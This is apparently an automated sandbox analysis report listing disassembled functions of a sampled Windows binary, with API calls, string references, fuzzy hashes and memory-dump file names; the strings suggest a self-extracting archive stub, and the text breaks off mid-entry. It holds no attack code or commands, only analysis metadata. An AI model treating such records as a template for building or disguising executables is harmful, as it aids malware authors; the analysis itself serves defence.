Part of subcall function 00B73316: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013316,00B6D523,00000000,.exe,?,?,00000800,?,?,?,00B79E5C), ref: 00B7332C

GetWindowLongW.USER32(00000000,000000F0), ref: 00B7E859
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00B7E870
GetObjectW.GDI32(00000000,00000018,?), ref: 00B7E884
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00B7E8AD
DeleteObject.GDI32(00000000), ref: 00B7E8B4
GetWindow.USER32(00000000,00000002), ref: 00B7E8BD

Strings

STATIC, xrefs: 00B7E843

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: b75da5f6bcc55a163cd4683ed18e54eaf90d32741b3e3fa917ea9545ff819398
Instruction ID: a61f47c6551bca56c286c3faf9ff5cc9e320f49ea6276568bcc6e006f4b08cf4
Opcode Fuzzy Hash: b75da5f6bcc55a163cd4683ed18e54eaf90d32741b3e3fa917ea9545ff819398
Instruction Fuzzy Hash: F9110232100A107BE3316B609C4EFAF36ECEF1C710F0481B0FA39A6092CF64D94556B6

Function 00B8A421 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B8A435

Part of subcall function 00B8A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00B8DA56,?,00000000,?,00000000,?,00B8DA7D,?,00000007,?,?,00B8DE7A,?), ref: 00B8A680
Part of subcall function 00B8A66A: GetLastError.KERNEL32(?,?,00B8DA56,?,00000000,?,00000000,?,00B8DA7D,?,00000007,?,?,00B8DE7A,?,?), ref: 00B8A692

_free.LIBCMT ref: 00B8A441
_free.LIBCMT ref: 00B8A44C
_free.LIBCMT ref: 00B8A457
_free.LIBCMT ref: 00B8A462
_free.LIBCMT ref: 00B8A46D
_free.LIBCMT ref: 00B8A478
_free.LIBCMT ref: 00B8A483
_free.LIBCMT ref: 00B8A48E
_free.LIBCMT ref: 00B8A49C

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b3539f7e26890c6eadca907414142e099b575408fd1ce387803475adbd68b6cb
Instruction ID: 68f7f7463dc14b332d3fc29cce54132714726e66d604da7e4a2ac39c7bb16348
Opcode Fuzzy Hash: b3539f7e26890c6eadca907414142e099b575408fd1ce387803475adbd68b6cb
Instruction Fuzzy Hash: 5D11A476110108AFEB01FF94C852CDA3BF5EF15B50F4581A6FA088B236EA31EE51DB81

Function 00B83FC1 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00B840E0
___TypeMatch.LIBVCRUNTIME ref: 00B841EE
_UnwindNestedFrames.LIBCMT ref: 00B84340
CallUnexpected.LIBVCRUNTIME ref: 00B8435B
_abort.LIBCMT ref: 00B84360

Strings

csm, xrefs: 00B83FFE
csm, xrefs: 00B8406B
csm, xrefs: 00B84117

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: d547597a8604cd45b9cbd4546e44caf8441a8f55c69fca45b08072d22e89eee3
Instruction ID: 55462e2de6a7097111c2101aed3bf1d64936a5a930cf069a1155cb6e7b653f47
Opcode Fuzzy Hash: d547597a8604cd45b9cbd4546e44caf8441a8f55c69fca45b08072d22e89eee3
Instruction Fuzzy Hash: E9B1577180020AEFCF25FFA4C8819AEBBF5FF14710B1545AAF8156B222D731EA51CB95

Function 00B7A6D1 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B7A6F6
_wcslen.LIBCMT ref: 00B7A796
GlobalAlloc.KERNEL32(00000040,?), ref: 00B7A7A5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00B7A7C6

Strings

utf-8"></head>, xrefs: 00B7A72B
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00B7A720
<html>, xrefs: 00B7A715, 00B7A74E
</html>, xrefs: 00B7A777

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: _wcslen$AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1116704506-4209811716
Opcode ID: 6ab76028abe5e60de71f02d831cdc50cca36df1cadb0c9964cc0056893473c04
Instruction ID: 261ef9df0ba1bc80325a4a6320d1ff7b3e3d9aa0967f4f3c025bca3ec99032d9
Opcode Fuzzy Hash: 6ab76028abe5e60de71f02d831cdc50cca36df1cadb0c9964cc0056893473c04
Instruction Fuzzy Hash: B73157321043017AE729BB609C46F6FBBE8EF91710F14809EF415A61E1EF649D0983A6

Function 00B6B5D6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B6B5E2

Part of subcall function 00B72701: GetSystemTime.KERNEL32(?), ref: 00B7270F
Part of subcall function 00B72701: SystemTimeToFileTime.KERNEL32(?,?), ref: 00B7271D

Part of subcall function 00B726AA: __aulldiv.LIBCMT ref: 00B726B3

__aulldiv.LIBCMT ref: 00B6B60E
GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 00B6B615
_swprintf.LIBCMT ref: 00B6B640

Part of subcall function 00B64A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B64A33

_wcslen.LIBCMT ref: 00B6B64A
_swprintf.LIBCMT ref: 00B6B6A0
_wcslen.LIBCMT ref: 00B6B6AA

Strings

%u.%03u, xrefs: 00B6B630, 00B6B694

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
String ID: %u.%03u
API String ID: 2956649372-1114938957
Opcode ID: 5b604480fcef5eaf629119ba183743269ac4eef1c11192e7ec74a5df6faf480d
Instruction ID: d182bca115162d3db05692a6167224bef14579ea22185770d49e48def6772c65
Opcode Fuzzy Hash: 5b604480fcef5eaf629119ba183743269ac4eef1c11192e7ec74a5df6faf480d
Instruction Fuzzy Hash: 322190B2A083006FD614EF65CC85DABB7ECEBD4710F0449AEF599D3251DB34DA0887A2

Function 00B7BC2B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 00B7BC3F
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B7BC50
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B7BC5E
FileTimeToSystemTime.KERNEL32(?,?), ref: 00B7BC6C
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00B7BC87
GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 00B7BCAE
_swprintf.LIBCMT ref: 00B7BCD4

Strings

%s %s, xrefs: 00B7BCC9

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Time$System$File$Format$DateLocalSpecific_swprintf
String ID: %s %s
API String ID: 385609497-2939940506
Opcode ID: 0bd5044e073a9e8a68171c0a4e96575450ee80ee3e1c2ccf48cbf06be78d976b
Instruction ID: 48158dcf6a1658ee22c63d8dacd3a4c0386a5f58495876b052cff9d0fdaea7aa
Opcode Fuzzy Hash: 0bd5044e073a9e8a68171c0a4e96575450ee80ee3e1c2ccf48cbf06be78d976b
Instruction Fuzzy Hash: 6121C7B254115CABDB21DFA0ED45EEF3BACFF19304F144466FA15D2121EB20DA498B60

Function 00B80ED0 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00B6C43F,00B6C441,00000000,00000000,A8602748,00000001,00000000,00000000,00B6C32C,?,?,?,00B6C43F,ROOT\CIMV2), ref: 00B80F59
MultiByteToWideChar.KERNEL32(00000000,00000000,00B6C43F,?,00000000,00000000,?,?,?,?,?,00B6C43F), ref: 00B80FD4
SysAllocString.OLEAUT32(00000000), ref: 00B80FDF
_com_issue_error.COMSUPP ref: 00B81008
_com_issue_error.COMSUPP ref: 00B81012
GetLastError.KERNEL32(80070057,A8602748,00000001,00000000,00000000,00B6C32C,?,?,?,00B6C43F,ROOT\CIMV2), ref: 00B81017
_com_issue_error.COMSUPP ref: 00B8102A
GetLastError.KERNEL32(00000000,?,00B6C43F,ROOT\CIMV2), ref: 00B81040
_com_issue_error.COMSUPP ref: 00B81053

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 1226c1db92a5187625655c4d464ee05a6263774d9fe52d52d8d1d0c0ce207b41
Instruction ID: 659e72ff077a530e2ea6530be4790f684f0516a49f1a61b326456bf78d78b6f5
Opcode Fuzzy Hash: 1226c1db92a5187625655c4d464ee05a6263774d9fe52d52d8d1d0c0ce207b41
Instruction Fuzzy Hash: 6C411971A10215AFCB10BF68DC45FAFBBE8EF08750F1086AAF505E7260DB35A845C7A4

Function 00B6C3F7 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B6C3FC

Strings

Name, xrefs: 00B6C583
Windows 10, xrefs: 00B6C595
WQL, xrefs: 00B6C4AF
SELECT * FROM Win32_OperatingSystem, xrefs: 00B6C49D
ROOT\CIMV2, xrefs: 00B6C42F

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: 62a20c7019b9e1fd3488bf271c94efedc68f6dd60186934e0ef5461afc9ccab7
Instruction ID: 1273bc67fc7b32660978e75dc9f07263d063df3b69f0854f9ff77b3db09c88b2
Opcode Fuzzy Hash: 62a20c7019b9e1fd3488bf271c94efedc68f6dd60186934e0ef5461afc9ccab7
Instruction Fuzzy Hash: 0A711A71A00219AFDF14DFA4CC95DBEBBF9FF88710B144599E556A72A0CB34AD02CB60

Function 00B6A5E9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00B6A5EE
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00B6A611
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00B6A630

Part of subcall function 00B6D6A7: _wcslen.LIBCMT ref: 00B6D6AF

Part of subcall function 00B73316: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013316,00B6D523,00000000,.exe,?,?,00000800,?,?,?,00B79E5C), ref: 00B7332C

_swprintf.LIBCMT ref: 00B6A6CC

Part of subcall function 00B64A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B64A33

MoveFileW.KERNEL32(?,?), ref: 00B6A73B
MoveFileW.KERNEL32(?,?), ref: 00B6A77B

Strings

rtmp%d, xrefs: 00B6A6B5

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: c3b282efe6c4475ae166e247aea1325e90b8650f6588cf1c4b4ce1f7abe0f074
Instruction ID: fdfbfe181efc41d533a46f09d565e72bea9399a756a4f4f852fe1a191d3543fb
Opcode Fuzzy Hash: c3b282efe6c4475ae166e247aea1325e90b8650f6588cf1c4b4ce1f7abe0f074
Instruction Fuzzy Hash: AE412B719005696ACF20ABA0CC85EEF73FCEF45340F0404E5B659B3046EB389E859F65

Function 00B72538 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00B7254E

Part of subcall function 00B6C619: GetVersionExW.KERNEL32(?), ref: 00B6C63E

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,00000001), ref: 00B72571
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,00000001), ref: 00B72583
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00B72594
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B725A4
SystemTimeToFileTime.KERNEL32(?,?), ref: 00B725B4
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00B725EF
__aullrem.LIBCMT ref: 00B72699

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 4d07d7fc0ea39855447d6d56228c74a6f896bd76404ea22f5d01a67f1ca07bd6
Instruction ID: 28900dd417535f77f90c8a871a10810e2a68c0d65bbf81fb71ce67091b42f1ce
Opcode Fuzzy Hash: 4d07d7fc0ea39855447d6d56228c74a6f896bd76404ea22f5d01a67f1ca07bd6
Instruction Fuzzy Hash: E84106B25083059FC710DF65C88496BBBE9FB98314F10892EF59AD3210E735E549CB62

Function 00B7AD1E Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B7AD2A

Strings

>, xrefs: 00B7AD6B
</style>, xrefs: 00B7AE72
<br>, xrefs: 00B7AE1E
</p>, xrefs: 00B7AE08
<style>, xrefs: 00B7AE50

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: 7a1168b4e74a3b3f48a2f254e287aa04422a29e028a6bcebb0e35c0090ec4360
Instruction ID: 7d7131d17556d3c39073bf44966e819bdb4e238567779a0f98a6b6001596a7a9
Opcode Fuzzy Hash: 7a1168b4e74a3b3f48a2f254e287aa04422a29e028a6bcebb0e35c0090ec4360
Instruction Fuzzy Hash: 2651266674432395DBB05A24885177E73E0DFE0751F68C4BBF9A88B5C0FB648D419263

Function 00B9084D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00B90FC2,00000000,00000000,00000000,00000000,00000000,00B865AD), ref: 00B9088F
__fassign.LIBCMT ref: 00B9090A
__fassign.LIBCMT ref: 00B90925
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00B9094B
WriteFile.KERNEL32(?,00000000,00000000,00B90FC2,00000000,?,?,?,?,?,?,?,?,?,00B90FC2,00000000), ref: 00B9096A
WriteFile.KERNEL32(?,00000000,00000001,00B90FC2,00000000,?,?,?,?,?,?,?,?,?,00B90FC2,00000000), ref: 00B909A3

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 9c939685825358f49d7a7a1c305ca9b26fefdf883dd95053c30f1a5165f1d312
Instruction ID: 20bb3243896f65f9effb0d123c829137cb36f43c299e526df313b048b64348d4
Opcode Fuzzy Hash: 9c939685825358f49d7a7a1c305ca9b26fefdf883dd95053c30f1a5165f1d312
Instruction Fuzzy Hash: 22519471A10249AFDF10DFA8DC86BEEBBF8EF19300F14416AE955E7252E7309941CB60

Function 00B83A90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00B83AC7
___except_validate_context_record.LIBVCRUNTIME ref: 00B83ACF
_ValidateLocalCookies.LIBCMT ref: 00B83B58
__IsNonwritableInCurrentImage.LIBCMT ref: 00B83B83
_ValidateLocalCookies.LIBCMT ref: 00B83BD8

Strings

csm, xrefs: 00B83B6D

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 1bd4206c38c925f9bce7818ad9a9a30cde09b07caa59128fac50adbdf090896b
Instruction ID: 2ef7ddd258554c73f0224b18905feb33ce7fd30fd6fc833ab342c4a60ca499f3
Opcode Fuzzy Hash: 1bd4206c38c925f9bce7818ad9a9a30cde09b07caa59128fac50adbdf090896b
Instruction Fuzzy Hash: 8541AF74A00209ABCF10EF69C881A9EBBF5EF45B24F1481D5E8145B2B2D771EA05CF90

Function 00B7AEF5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00B7AF0E
GetWindowRect.USER32(?,?), ref: 00B7AF64
ShowWindow.USER32(?,00000005,00000000), ref: 00B7B001
SetWindowTextW.USER32(?,00000000), ref: 00B7B009
ShowWindow.USER32(00000000,00000005), ref: 00B7B01F

Strings

RarHtmlClassName, xrefs: 00B7AFC5

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b60000_4.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 9288513328dcf346cad11f3679bfb0e971840538d56150c77e4636fedb9d5968
Instruction ID: 52b1617f124a8081aadc73ae0b7d7db035e92066e4ae3bf374ca4d2cf8c1d873
Opcode Fuzzy Hash: 9288513328dcf346cad11f3679bfb0e971840538d56150c77e4636fedb9d5968
Instruction Fuzzy Hash: A741B171444204AFDB329F60DC4DF6B7BE8EB4C701F188599F95DAA062DB70E944CB62

Function 00B7A975 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B7A97E
_wcslen.LIBCMT ref: 00B7A9B3

Strings

, xrefs: 00B7A9D0
<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 00B7A9A7
<br>, xrefs: 00B7A9FF
 , xrefs: 00B7AA41

Memory Dump Source

Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
